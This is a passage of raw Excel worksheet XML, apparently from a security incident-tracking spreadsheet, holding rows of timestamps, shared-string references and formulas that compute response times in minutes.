      <c r="BC65" s="9" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="BD65" s="9" t="str">
        <f t="shared" si="9"/>
        <v/>
      </c>
    </row>
    <row r="66" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A66" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B66" s="2">
        <v>46091.6101273148</v>
      </c>
      <c r="C66" s="10" t="s">
        <v>11629</v>
      </c>
      <c r="D66" s="10" t="s">
        <v>11630</v>
      </c>
      <c r="E66" s="10"/>
      <c r="F66" s="10"/>
      <c r="G66" s="10"/>
      <c r="H66" s="10"/>
      <c r="I66" s="11" t="s">
        <v>8596</v>
      </c>
      <c r="J66" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K66" s="10"/>
      <c r="L66" s="10"/>
      <c r="M66" s="10"/>
      <c r="N66" s="10" t="s">
        <v>11631</v>
      </c>
      <c r="O66" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P66" s="10" t="s">
        <v>11632</v>
      </c>
      <c r="Q66" s="10"/>
      <c r="R66" s="10"/>
      <c r="S66" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T66" s="10"/>
      <c r="U66" s="10"/>
      <c r="V66" s="13" t="s">
        <v>8432</v>
      </c>
      <c r="W66" s="10"/>
      <c r="X66" s="10" t="s">
        <v>11633</v>
      </c>
      <c r="Y66" s="10" t="s">
        <v>11634</v>
      </c>
      <c r="Z66" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA66" s="10"/>
      <c r="AB66" s="10"/>
      <c r="AC66" s="14">
        <v>46091.6101273148</v>
      </c>
      <c r="AD66" s="14"/>
      <c r="AE66" s="14"/>
      <c r="AF66" s="14"/>
      <c r="AG66" s="14"/>
      <c r="AH66" s="10" t="s">
        <v>11635</v>
      </c>
      <c r="AI66" s="10"/>
      <c r="AJ66" s="10"/>
      <c r="AK66" s="10"/>
      <c r="AL66" s="10"/>
      <c r="AM66" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN66" s="10"/>
      <c r="AO66" s="10"/>
      <c r="AP66" s="10"/>
      <c r="AQ66" s="10"/>
      <c r="AR66" s="10"/>
      <c r="AS66" s="10"/>
      <c r="AT66" s="10"/>
      <c r="AU66" s="10"/>
      <c r="AV66" s="10"/>
      <c r="AW66" s="10"/>
      <c r="AX66" s="14"/>
      <c r="AY66" s="1" t="e">
        <f>VLOOKUP(E66,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ66" s="9" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="BA66" s="9" t="str">
        <f t="shared" si="10"/>
        <v/>
      </c>
      <c r="BB66" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC66" s="9" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="BD66" s="9" t="str">
        <f t="shared" si="9"/>
        <v/>
      </c>
    </row>
    <row r="67" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A67" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B67" s="2">
        <v>46094.4338773148</v>
      </c>
      <c r="C67" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D67" s="10" t="s">
        <v>11636</v>
      </c>
      <c r="E67" s="10"/>
      <c r="F67" s="10"/>
      <c r="G67" s="10"/>
      <c r="H67" s="10"/>
      <c r="I67" s="11" t="s">
        <v>8596</v>
      </c>
      <c r="J67" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K67" s="10"/>
      <c r="L67" s="10"/>
      <c r="M67" s="10"/>
      <c r="N67" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O67" s="12" t="s">
        <v>11624</v>
      </c>
      <c r="P67" s="10" t="s">
        <v>11637</v>
      </c>
      <c r="Q67" s="10"/>
      <c r="R67" s="10"/>
      <c r="S67" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T67" s="10"/>
      <c r="U67" s="10"/>
      <c r="V67" s="15" t="s">
        <v>8377</v>
      </c>
      <c r="W67" s="10" t="s">
        <v>11626</v>
      </c>
      <c r="X67" s="10"/>
      <c r="Y67" s="10" t="s">
        <v>11638</v>
      </c>
      <c r="Z67" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA67" s="10"/>
      <c r="AB67" s="10"/>
      <c r="AC67" s="14">
        <v>46094.4338773148</v>
      </c>
      <c r="AD67" s="14"/>
      <c r="AE67" s="10"/>
      <c r="AF67" s="14"/>
      <c r="AG67" s="14"/>
      <c r="AH67" s="10"/>
      <c r="AI67" s="10"/>
      <c r="AJ67" s="10"/>
      <c r="AK67" s="10"/>
      <c r="AL67" s="10" t="s">
        <v>11639</v>
      </c>
      <c r="AM67" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN67" s="10"/>
      <c r="AO67" s="10"/>
      <c r="AP67" s="10"/>
      <c r="AQ67" s="10"/>
      <c r="AR67" s="10"/>
      <c r="AS67" s="10"/>
      <c r="AT67" s="10"/>
      <c r="AU67" s="10"/>
      <c r="AV67" s="10"/>
      <c r="AW67" s="10"/>
      <c r="AX67" s="14"/>
      <c r="AY67" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ67" s="9" t="str">
        <f t="shared" ref="AZ67:AZ98" si="11">IF(A67&lt;&gt;"最新威胁",ROUND((B67-AD67)*24*60,2),"")</f>
        <v/>
      </c>
      <c r="BA67" s="9" t="str">
        <f t="shared" si="10"/>
        <v/>
      </c>
      <c r="BB67" s="9" t="str">
        <f t="shared" ref="BB67:BB98" si="12">IF(A67&lt;&gt;"最新威胁",IF(ISBLANK(AX67),"",ROUND((AX67-B67)*24*60,2)),"")</f>
        <v/>
      </c>
      <c r="BC67" s="9" t="str">
        <f t="shared" ref="BC67:BC98" si="13">IF(A67&lt;&gt;"最新威胁",IF(ISBLANK(AF67),ROUND((AC67-B67)*24*60,2),ROUND((AF67-B67)*24*60,2)),"")</f>
        <v/>
      </c>
      <c r="BD67" s="9" t="str">
        <f t="shared" ref="BD67:BD98" si="14">IF(A67&lt;&gt;"最新威胁",IF(ISBLANK(AG67),ROUND((AC67-B67)*24*60,2),ROUND((AG67-B67)*24*60,2)),"")</f>
        <v/>
      </c>
    </row>
    <row r="68" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A68" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B68" s="2">
        <v>45870.4123958333</v>
      </c>
      <c r="C68" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D68" s="10" t="s">
        <v>11640</v>
      </c>
      <c r="E68" s="10"/>
      <c r="F68" s="10"/>
      <c r="G68" s="10"/>
      <c r="H68" s="10"/>
      <c r="I68" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J68" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K68" s="10"/>
      <c r="L68" s="10"/>
      <c r="M68" s="10"/>
      <c r="N68" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O68" s="12" t="s">
        <v>11624</v>
      </c>
      <c r="P68" s="10" t="s">
        <v>11641</v>
      </c>
      <c r="Q68" s="10"/>
      <c r="R68" s="10"/>
      <c r="S68" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T68" s="10"/>
      <c r="U68" s="10"/>
      <c r="V68" s="15" t="s">
        <v>8377</v>
      </c>
      <c r="W68" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X68" s="10"/>
      <c r="Y68" s="10" t="s">
        <v>11643</v>
      </c>
      <c r="Z68" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA68" s="10"/>
      <c r="AB68" s="10"/>
      <c r="AC68" s="14">
        <v>45873.461099537</v>
      </c>
      <c r="AD68" s="14"/>
      <c r="AE68" s="10"/>
      <c r="AF68" s="14"/>
      <c r="AG68" s="14">
        <v>45873.461099537</v>
      </c>
      <c r="AH68" s="10"/>
      <c r="AI68" s="10"/>
      <c r="AJ68" s="10"/>
      <c r="AK68" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL68" s="10" t="s">
        <v>11644</v>
      </c>
      <c r="AM68" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN68" s="10"/>
      <c r="AO68" s="10"/>
      <c r="AP68" s="10"/>
      <c r="AQ68" s="10" t="s">
        <v>11645</v>
      </c>
      <c r="AR68" s="10"/>
      <c r="AS68" s="10" t="s">
        <v>11646</v>
      </c>
      <c r="AT68" s="10"/>
      <c r="AU68" s="10"/>
      <c r="AV68" s="10" t="s">
        <v>11647</v>
      </c>
      <c r="AW68" s="10"/>
      <c r="AX68" s="14"/>
      <c r="AY68" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ68" s="9" t="str">
        <f t="shared" si="11"/>
        <v/>
      </c>
      <c r="BA68" s="9" t="str">
        <f t="shared" si="10"/>
        <v/>
      </c>
      <c r="BB68" s="9" t="str">
        <f t="shared" si="12"/>
        <v/>
      </c>
      <c r="BC68" s="9" t="str">
        <f t="shared" si="13"/>
        <v/>
      </c>
      <c r="BD68" s="9" t="str">
        <f t="shared" si="14"/>
        <v/>
      </c>
    </row>
    <row r="69" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A69" s="1" t="s">
        <v>311</v>
      </c>
      <c r="B69" s="2">
        <v>45870.6108333333</v>
      </c>
      <c r="C69" s="10" t="s">
        <v>107</v>
      </c>
      <c r="D69" s="10" t="s">
        <v>11357</v>
      </c>
      <c r="E69" s="10" t="s">
        <v>11517</v>
      </c>
      <c r="F69" s="10" t="s">
        <v>11590</v>
      </c>
      <c r="G69" s="10" t="s">
        <v>11517</v>
      </c>
      <c r="H69" s="10"/>
      <c r="I69" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J69" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K69" s="10"/>
      <c r="L69" s="10" t="s">
        <v>3690</v>
      </c>
      <c r="M69" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N69" s="10" t="s">
        <v>107</v>
      </c>
      <c r="O69" s="15" t="s">
        <v>8400</v>
      </c>
      <c r="P69" s="10"/>
      <c r="Q69" s="10"/>
      <c r="R69" s="10"/>
      <c r="S69" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T69" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U69" s="10" t="s">
        <v>9079</v>
      </c>
      <c r="V69" s="15" t="s">
        <v>8400</v>
      </c>
      <c r="W69" s="10"/>
      <c r="X69" s="10" t="s">
        <v>11648</v>
      </c>
      <c r="Y69" s="10" t="s">
        <v>11527</v>
      </c>
      <c r="Z69" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA69" s="10"/>
      <c r="AB69" s="10" t="s">
        <v>11521</v>
      </c>
      <c r="AC69" s="14">
        <v>45919.6766203704</v>
      </c>
      <c r="AD69" s="14">
        <v>45870.6065277778</v>
      </c>
      <c r="AE69" s="14">
        <v>45870.6220949074</v>
      </c>
      <c r="AF69" s="14">
        <v>45870.6226967593</v>
      </c>
      <c r="AG69" s="14">
        <v>45870.6226967593</v>
      </c>
      <c r="AH69" s="10"/>
      <c r="AI69" s="10"/>
      <c r="AJ69" s="10"/>
      <c r="AK69" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL69" s="10" t="s">
        <v>11517</v>
      </c>
      <c r="AM69" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN69" s="10"/>
      <c r="AO69" s="10" t="s">
        <v>9079</v>
      </c>
      <c r="AP69" s="10"/>
      <c r="AQ69" s="10" t="s">
        <v>11649</v>
      </c>
      <c r="AR69" s="10"/>
      <c r="AS69" s="10"/>
      <c r="AT69" s="14"/>
      <c r="AU69" s="10"/>
      <c r="AV69" s="10" t="s">
        <v>11650</v>
      </c>
      <c r="AW69" s="10"/>
      <c r="AX69" s="14"/>
      <c r="AY69" s="1" t="e">
        <f>VLOOKUP(E69,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ69" s="9">
        <f t="shared" si="11"/>
        <v>6.2</v>
      </c>
      <c r="BA69" s="9">
        <f t="shared" si="10"/>
        <v>16.22</v>
      </c>
      <c r="BB69" s="9" t="str">
        <f t="shared" si="12"/>
        <v/>
      </c>
      <c r="BC69" s="9">
        <f t="shared" si="13"/>
        <v>17.08</v>
      </c>
      <c r="BD69" s="9">
        <f t="shared" si="14"/>
        <v>17.08</v>
      </c>
    </row>
    <row r="70" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A70" s="1" t="s">
        <v>311</v>
      </c>
      <c r="B70" s="2">
        <v>45870.6352777778</v>
      </c>
      <c r="C70" s="10" t="s">
        <v>107</v>
      </c>
      <c r="D70" s="10" t="s">
        <v>11357</v>
      </c>
      <c r="E70" s="10" t="s">
        <v>11517</v>
      </c>
      <c r="F70" s="10" t="s">
        <v>11590</v>
      </c>
      <c r="G70" s="10" t="s">
        <v>11517</v>
      </c>
      <c r="H70" s="10"/>
      <c r="I70" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J70" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K70" s="10"/>
      <c r="L70" s="10" t="s">
        <v>3690</v>
      </c>
      <c r="M70" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N70" s="10" t="s">
        <v>107</v>
      </c>
      <c r="O70" s="12" t="s">
        <v>8400</v>
      </c>
      <c r="P70" s="10"/>
      <c r="Q70" s="10"/>
      <c r="R70" s="10"/>
      <c r="S70" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T70" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U70" s="10" t="s">
        <v>9079</v>
      </c>
      <c r="V70" s="15" t="s">
        <v>8400</v>
      </c>
      <c r="W70" s="10"/>
      <c r="X70" s="10" t="s">
        <v>11648</v>
      </c>
      <c r="Y70" s="10" t="s">
        <v>11524</v>
      </c>
      <c r="Z70" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA70" s="10"/>
      <c r="AB70" s="10" t="s">
        <v>11521</v>
      </c>
      <c r="AC70" s="14">
        <v>45881.6537615741</v>
      </c>
      <c r="AD70" s="14">
        <v>45870.6298148148</v>
      </c>
      <c r="AE70" s="14">
        <v>45870.6353472222</v>
      </c>
      <c r="AF70" s="14">
        <v>45870.6359375</v>
      </c>
      <c r="AG70" s="14">
        <v>45870.6359375</v>
      </c>
      <c r="AH70" s="10"/>
      <c r="AI70" s="10"/>
      <c r="AJ70" s="10"/>
      <c r="AK70" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL70" s="10" t="s">
        <v>11517</v>
      </c>
      <c r="AM70" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN70" s="10"/>
      <c r="AO70" s="10" t="s">
        <v>9079</v>
      </c>
      <c r="AP70" s="10"/>
      <c r="AQ70" s="10" t="s">
        <v>11649</v>
      </c>
      <c r="AR70" s="10"/>
      <c r="AS70" s="10"/>
      <c r="AT70" s="10"/>
      <c r="AU70" s="10"/>
      <c r="AV70" s="10" t="s">
        <v>11651</v>
      </c>
      <c r="AW70" s="10"/>
      <c r="AX70" s="14"/>
      <c r="AY70" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ70" s="9">
        <f t="shared" si="11"/>
        <v>7.87</v>
      </c>
      <c r="BA70" s="9">
        <f t="shared" si="10"/>
        <v>0.1</v>
      </c>
      <c r="BB70" s="9" t="str">
        <f t="shared" si="12"/>
        <v/>
      </c>
      <c r="BC70" s="9">
        <f t="shared" si="13"/>
        <v>0.95</v>
      </c>
      <c r="BD70" s="9">
        <f t="shared" si="14"/>
        <v>0.95</v>
      </c>
    </row>
    <row r="71" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A71" s="1" t="s">
        <v>311</v>
      </c>
      <c r="B71" s="2">
        <v>45871.5828819444</v>
      </c>
      <c r="C71" s="10" t="s">
        <v>107</v>
      </c>
      <c r="D71" s="10" t="s">
        <v>11357</v>
      </c>
      <c r="E71" s="10" t="s">
        <v>11517</v>
      </c>
      <c r="F71" s="10" t="s">
        <v>11590</v>
      </c>
      <c r="G71" s="10" t="s">
        <v>11517</v>
      </c>
      <c r="H71" s="10"/>
      <c r="I71" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J71" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K71" s="10"/>
      <c r="L71" s="10" t="s">
        <v>3690</v>
      </c>
      <c r="M71" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N71" s="10" t="s">
        <v>107</v>
      </c>
      <c r="O71" s="15" t="s">
        <v>8400</v>
      </c>
      <c r="P71" s="10"/>
      <c r="Q71" s="10"/>
      <c r="R71" s="10"/>
      <c r="S71" s="10" t="s">
        <v>9200</v>
      </c>
      <c r="T71" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U71" s="10" t="s">
        <v>9079</v>
      </c>
      <c r="V71" s="15" t="s">
        <v>8400</v>
      </c>
      <c r="W71" s="10"/>
      <c r="X71" s="10" t="s">
        <v>11648</v>
      </c>
      <c r="Y71" s="10" t="s">
        <v>11520</v>
      </c>
      <c r="Z71" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA71" s="10"/>
      <c r="AB71" s="10" t="s">
        <v>11521</v>
      </c>
      <c r="AC71" s="14">
        <v>45871.5831597222</v>
      </c>
      <c r="AD71" s="14">
        <v>45871.5763425926</v>
      </c>
      <c r="AE71" s="14">
        <v>45871.5829282407</v>
      </c>
      <c r="AF71" s="14">
        <v>45871.5831597222</v>
      </c>
      <c r="AG71" s="14">
        <v>45871.5831597222</v>
      </c>
      <c r="AH71" s="10"/>
      <c r="AI71" s="10"/>
      <c r="AJ71" s="10"/>
      <c r="AK71" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL71" s="10" t="s">
        <v>11517</v>
      </c>
      <c r="AM71" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN71" s="10"/>
      <c r="AO71" s="10" t="s">
        <v>9079</v>
      </c>
      <c r="AP71" s="10"/>
      <c r="AQ71" s="10" t="s">
        <v>11649</v>
      </c>
      <c r="AR71" s="10"/>
      <c r="AS71" s="10"/>
      <c r="AT71" s="10"/>
      <c r="AU71" s="10"/>
      <c r="AV71" s="10" t="s">
        <v>11651</v>
      </c>
      <c r="AW71" s="10"/>
      <c r="AX71" s="14"/>
      <c r="AY71" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ71" s="9">
        <f t="shared" si="11"/>
        <v>9.42</v>
      </c>
      <c r="BA71" s="9">
        <f t="shared" si="10"/>
        <v>0.07</v>
      </c>
      <c r="BB71" s="9" t="str">
        <f t="shared" si="12"/>
        <v/>
      </c>
      <c r="BC71" s="9">
        <f t="shared" si="13"/>
        <v>0.4</v>
      </c>
      <c r="BD71" s="9">
        <f t="shared" si="14"/>
        <v>0.4</v>
      </c>
    </row>
    <row r="72" s="1" customFormat="1" spans="1:56">
      <c r="A72" s="1" t="s">
        <v>311</v>
      </c>
      <c r="B72" s="2">
        <v>45872.1925115741</v>
      </c>
      <c r="C72" s="10" t="s">
        <v>167</v>
      </c>
      <c r="D72" s="10" t="s">
        <v>11488</v>
      </c>
      <c r="E72" s="10" t="s">
        <v>3341</v>
      </c>
      <c r="F72" s="10" t="s">
        <v>11574</v>
      </c>
      <c r="G72" s="10" t="s">
        <v>3341</v>
      </c>
      <c r="H72" s="10"/>
      <c r="I72" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J72" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K72" s="10"/>
      <c r="L72" s="10" t="s">
        <v>3690</v>
      </c>
      <c r="M72" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N72" s="10" t="s">
        <v>167</v>
      </c>
      <c r="O72" s="15" t="s">
        <v>8400</v>
      </c>
      <c r="P72" s="10"/>
      <c r="Q72" s="10"/>
      <c r="R72" s="10"/>
      <c r="S72" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T72" s="10" t="s">
        <v>123</v>
      </c>
      <c r="U72" s="10" t="s">
        <v>8436</v>
      </c>
      <c r="V72" s="15" t="s">
        <v>8400</v>
      </c>
      <c r="W72" s="10" t="s">
        <v>8431</v>
      </c>
      <c r="X72" s="10" t="s">
        <v>11652</v>
      </c>
      <c r="Y72" s="10" t="s">
        <v>11494</v>
      </c>
      <c r="Z72" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA72" s="10"/>
      <c r="AB72" s="10" t="s">
        <v>3361</v>
      </c>
      <c r="AC72" s="14">
        <v>45874.3750462963</v>
      </c>
      <c r="AD72" s="14">
        <v>45872.1906365741</v>
      </c>
      <c r="AE72" s="14">
        <v>45872.1925925926</v>
      </c>
      <c r="AF72" s="14">
        <v>45874.3750347222</v>
      </c>
      <c r="AG72" s="14">
        <v>45874.3750462963</v>
      </c>
      <c r="AH72" s="10"/>
      <c r="AI72" s="10"/>
      <c r="AJ72" s="10"/>
      <c r="AK72" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL72" s="10" t="s">
        <v>3341</v>
      </c>
      <c r="AM72" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN72" s="10"/>
      <c r="AO72" s="10" t="s">
        <v>8658</v>
      </c>
      <c r="AP72" s="10"/>
      <c r="AQ72" s="10" t="s">
        <v>11653</v>
      </c>
      <c r="AR72" s="10"/>
      <c r="AS72" s="10"/>
      <c r="AT72" s="10"/>
      <c r="AU72" s="10"/>
      <c r="AV72" s="10" t="s">
        <v>11654</v>
      </c>
      <c r="AW72" s="10"/>
      <c r="AX72" s="14"/>
      <c r="AY72" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ72" s="9">
        <f t="shared" si="11"/>
        <v>2.7</v>
      </c>
      <c r="BA72" s="9">
        <f t="shared" si="10"/>
        <v>0.12</v>
      </c>
      <c r="BB72" s="9" t="str">
        <f t="shared" si="12"/>
        <v/>
      </c>
      <c r="BC72" s="9">
        <f t="shared" si="13"/>
        <v>3142.83</v>
      </c>
      <c r="BD72" s="9">
        <f t="shared" si="14"/>
        <v>3142.85</v>
      </c>
    </row>
    <row r="73" s="1" customFormat="1" spans="1:56">
      <c r="A73" s="1" t="s">
        <v>311</v>
      </c>
      <c r="B73" s="2">
        <v>45872.1987615741</v>
      </c>
      <c r="C73" s="10" t="s">
        <v>112</v>
      </c>
      <c r="D73" s="10" t="s">
        <v>11488</v>
      </c>
      <c r="E73" s="10" t="s">
        <v>3341</v>
      </c>
      <c r="F73" s="10" t="s">
        <v>11574</v>
      </c>
      <c r="G73" s="10" t="s">
        <v>3341</v>
      </c>
      <c r="H73" s="10"/>
      <c r="I73" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J73" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K73" s="10"/>
      <c r="L73" s="10" t="s">
        <v>3690</v>
      </c>
      <c r="M73" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N73" s="10" t="s">
        <v>112</v>
      </c>
      <c r="O73" s="15" t="s">
        <v>8400</v>
      </c>
      <c r="P73" s="10"/>
      <c r="Q73" s="10"/>
      <c r="R73" s="10"/>
      <c r="S73" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T73" s="10" t="s">
        <v>123</v>
      </c>
      <c r="U73" s="10" t="s">
        <v>8436</v>
      </c>
      <c r="V73" s="13" t="s">
        <v>8400</v>
      </c>
      <c r="W73" s="10" t="s">
        <v>8431</v>
      </c>
      <c r="X73" s="10" t="s">
        <v>11655</v>
      </c>
      <c r="Y73" s="10" t="s">
        <v>11490</v>
      </c>
      <c r="Z73" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA73" s="10"/>
      <c r="AB73" s="10" t="s">
        <v>11656</v>
      </c>
      <c r="AC73" s="14">
        <v>45881.6552083333</v>
      </c>
      <c r="AD73" s="14">
        <v>45872.1963773148</v>
      </c>
      <c r="AE73" s="14">
        <v>45872.1988888889</v>
      </c>
      <c r="AF73" s="14">
        <v>45874.3750347222</v>
      </c>
      <c r="AG73" s="14">
        <v>45874.3750462963</v>
      </c>
      <c r="AH73" s="10"/>
      <c r="AI73" s="10"/>
      <c r="AJ73" s="10"/>
      <c r="AK73" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL73" s="10" t="s">
        <v>11657</v>
      </c>
      <c r="AM73" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN73" s="10"/>
      <c r="AO73" s="10" t="s">
        <v>8658</v>
      </c>
      <c r="AP73" s="10"/>
      <c r="AQ73" s="10" t="s">
        <v>11658</v>
      </c>
      <c r="AR73" s="10"/>
      <c r="AS73" s="10"/>
      <c r="AT73" s="10"/>
      <c r="AU73" s="10"/>
      <c r="AV73" s="10" t="s">
        <v>11654</v>
      </c>
      <c r="AW73" s="10"/>
      <c r="AX73" s="14"/>
      <c r="AY73" s="1" t="str">
        <f>VLOOKUP(E73,资产表!C:AG,31,0)</f>
        <v>外网</v>
      </c>
      <c r="AZ73" s="9">
        <f t="shared" si="11"/>
        <v>3.43</v>
      </c>
      <c r="BA73" s="9">
        <f t="shared" si="10"/>
        <v>0.18</v>
      </c>
      <c r="BB73" s="9" t="str">
        <f t="shared" si="12"/>
        <v/>
      </c>
      <c r="BC73" s="9">
        <f t="shared" si="13"/>
        <v>3133.83</v>
      </c>
      <c r="BD73" s="9">
        <f t="shared" si="14"/>
        <v>3133.85</v>
      </c>
    </row>
    <row r="74" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A74" s="1" t="s">
        <v>311</v>
      </c>
      <c r="B74" s="2">
        <v>45873.0255787037</v>
      </c>
      <c r="C74" s="10" t="s">
        <v>109</v>
      </c>
      <c r="D74" s="10" t="s">
        <v>8488</v>
      </c>
      <c r="E74" s="10" t="s">
        <v>3034</v>
      </c>
      <c r="F74" s="10" t="s">
        <v>11594</v>
      </c>
      <c r="G74" s="10" t="s">
        <v>3034</v>
      </c>
      <c r="H74" s="10"/>
      <c r="I74" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J74" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K74" s="10"/>
      <c r="L74" s="10" t="s">
        <v>3690</v>
      </c>
      <c r="M74" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N74" s="10" t="s">
        <v>109</v>
      </c>
      <c r="O74" s="15" t="s">
        <v>8400</v>
      </c>
      <c r="P74" s="10"/>
      <c r="Q74" s="10"/>
      <c r="R74" s="10"/>
      <c r="S74" s="10" t="s">
        <v>8761</v>
      </c>
      <c r="T74" s="10" t="s">
        <v>121</v>
      </c>
      <c r="U74" s="10" t="s">
        <v>8600</v>
      </c>
      <c r="V74" s="15" t="s">
        <v>8400</v>
      </c>
      <c r="W74" s="10"/>
      <c r="X74" s="10" t="s">
        <v>11659</v>
      </c>
      <c r="Y74" s="10" t="s">
        <v>11484</v>
      </c>
      <c r="Z74" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA74" s="10"/>
      <c r="AB74" s="10" t="s">
        <v>11485</v>
      </c>
      <c r="AC74" s="14">
        <v>45873.026087963</v>
      </c>
      <c r="AD74" s="14">
        <v>45873.0236689815</v>
      </c>
      <c r="AE74" s="14">
        <v>45873.0258564815</v>
      </c>
      <c r="AF74" s="14">
        <v>45873.026087963</v>
      </c>
      <c r="AG74" s="14">
        <v>45873.026087963</v>
      </c>
      <c r="AH74" s="10"/>
      <c r="AI74" s="10"/>
      <c r="AJ74" s="10"/>
      <c r="AK74" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL74" s="10" t="s">
        <v>3034</v>
      </c>
      <c r="AM74" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN74" s="10"/>
      <c r="AO74" s="10" t="s">
        <v>8777</v>
      </c>
      <c r="AP74" s="10"/>
      <c r="AQ74" s="10" t="s">
        <v>11649</v>
      </c>
      <c r="AR74" s="10"/>
      <c r="AS74" s="10"/>
      <c r="AT74" s="10"/>
      <c r="AU74" s="10"/>
      <c r="AV74" s="10" t="s">
        <v>11651</v>
      </c>
      <c r="AW74" s="10"/>
      <c r="AX74" s="14"/>
      <c r="AY74" s="1" t="str">
        <f>VLOOKUP(E74,资产表!C:AG,31,0)</f>
        <v>外网</v>
      </c>
      <c r="AZ74" s="9">
        <f t="shared" si="11"/>
        <v>2.75</v>
      </c>
      <c r="BA74" s="9">
        <f t="shared" si="10"/>
        <v>0.4</v>
      </c>
      <c r="BB74" s="9" t="str">
        <f t="shared" si="12"/>
        <v/>
      </c>
      <c r="BC74" s="9">
        <f t="shared" si="13"/>
        <v>0.73</v>
      </c>
      <c r="BD74" s="9">
        <f t="shared" si="14"/>
        <v>0.73</v>
      </c>
    </row>
    <row r="75" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A75" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B75" s="2">
        <v>45873.4228125</v>
      </c>
      <c r="C75" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D75" s="10" t="s">
        <v>11660</v>
      </c>
      <c r="E75" s="10"/>
      <c r="F75" s="10"/>
      <c r="G75" s="10"/>
      <c r="H75" s="10"/>
      <c r="I75" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J75" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K75" s="10"/>
      <c r="L75" s="10"/>
      <c r="M75" s="10"/>
      <c r="N75" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O75" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P75" s="10" t="s">
        <v>11661</v>
      </c>
      <c r="Q75" s="10"/>
      <c r="R75" s="10"/>
      <c r="S75" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T75" s="10"/>
      <c r="U75" s="10"/>
      <c r="V75" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W75" s="10" t="s">
